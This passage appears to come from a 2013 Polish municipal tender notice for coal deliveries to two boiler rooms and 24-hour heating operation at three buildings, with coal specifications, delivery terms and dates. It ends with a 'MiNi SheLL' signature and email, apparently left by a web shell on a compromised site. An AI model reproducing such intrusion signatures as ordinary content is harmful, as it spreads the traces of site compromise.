     - kotłownia w budynku,  przy ul. Pl. Wolności 2    -  12 ton/ 12 miesięcy
     - kotłownia w budynku,  przy ul  Norwida 44        -  10 ton / 12 miesięcy
                                                                                                                                         
      Wymagane parametry węgla:
      Węgiel kamienny energetyczny typu GROSZEK EKO 31,2 płukany, klasy 26/050/06 
      sortymentu 0223/cc o następujących  parametrach:
      -   granulacja 5 - 20 mm, 
      -   średnie do wysokiej zawartości części lotnych 28% - 40%,
      -   wilgotność mniejsza niż 15%,
      -   temperatura topnienia popiołu powyżej 1150 stopni C,
      -   zawartość miału do 10% (granulacja ziarna poniżej 4mm).
      Zamawiający dopuszcza możliwość dostawy węgla o parametrach technicznych innych, lecz 
      nie gorszych niż podane przez Zamawiającego w niniejszej specyfikacji.


      Warunki Zamawiającego dotyczące dostawy węgla:
Dostawa węgla winna być realizowana przez Wykonawcę własnym środkiem transportu do  
miejsc składowania węgla, przy budynkach usytuowanych przy Pl. Wolności 2 i ul. Norwida 44, 
Dostawa węgla do  kotłowni węglowych winna być realizowana etapami, po uprzednim 
  	każdorazowym telefonicznym zamówieniu, w jednorazowej dostawie do 8 ton, przez 
  	upoważnionego pracownika ze strony Zamawiającego. 
Przewidywany termin pierwszej dostawy: wrzesień 2013r. 
Sposób rozliczenia za dostawę węgla określa wzór umowy stanowiący integralną część SIWZ.  

2)   świadczenie usług w zakresie utrzymania całodobowego ruchu cieplnego:
a)   w kotłowniach węglowych w budynkach mieszkalnych - wielorodzinnych przy 
      Plac Wolności 2  i  ul. Norwida  44
b)   w kotłowni gazowej w budynku użyteczności publicznej przy ul. Nowokościelnej 27
     
Szczegółowy zakres zadania nr 2 określa załącznik nr 2 do SIWZ.  

Zaleca się aby Wykonawca dokonał wizji lokalnej nieruchomości wyszczególnionych 
w załączniku nr 2 do SIWZ  na zadanie nr 2, celem zapoznania się z ich stanem technicznym.

Zamawiający wymaga, aby Wykonawca przez cały okres realizacji niniejszego zamówienia  posiadał punkt całodobowego pogotowia technicznego z telefonem stacjonarnym na terenie nieruchomości administrowanym przez ROM II. 

TERMIN  REALIZACJI  ZAMÓWIENIA DOT. ZADANIA NR 2:

1.	Dostawa węgla:            od dnia 16.09.2013 r. do dnia 15.09.2014 r.

2.	Obsługa techniczna kotłowni:
a)	 Plac Wolności 2         od dnia 16.09.2013 r. do dnia 15.05.2014 r. 
b)	 ul. Norwida 44            od dnia 16.09.2013 r. do dnia 15.05.2014 r. 
c)	 ul. Nowokościelna 27 od dnia 16.09.2013 r. do dnia 15.09.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.12.10-5, 50.53.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com